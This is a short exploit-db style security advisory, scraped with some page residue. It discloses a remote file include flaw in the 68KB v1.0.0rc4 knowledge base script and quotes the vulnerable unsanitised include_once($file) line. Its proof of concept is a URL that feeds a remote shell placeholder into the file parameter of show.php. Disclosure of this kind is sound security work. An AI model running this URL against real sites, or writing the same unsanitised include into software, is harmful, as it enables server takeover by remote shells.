34 lines
No EOL
1.2 KiB
Text
34 lines
No EOL
1.2 KiB
Text
====================================================
|
|
68KB v1.0.0rc4 Remote File Include Vulnerability
|
|
====================================================
|
|
|
|
Vendor: http://68kb.com
|
|
download: http://github.com/68designs/68KB/downloads
|
|
Author: eidelweiss
|
|
Contact: g1xsystem[at]windowslive.com
|
|
Original Advisories : http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html
|
|
=====================================================================
|
|
|
|
Description:
|
|
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.
|
|
|
|
Note:
|
|
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
|
|
Vendor Not Fix the vulnerability in all folder !!!
|
|
|
|
=====================================================================
|
|
|
|
-=[ vuln c0de ]=-
|
|
|
|
[!] path/themes/admin/default/modules/show.php
|
|
|
|
|
|
<?php include_once($file); ?>
|
|
|
|
=====================================================================
|
|
|
|
-=[ P0C ]=-
|
|
|
|
http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]
|
|
|
|
=========================| -=[ E0F ]=- |================================= |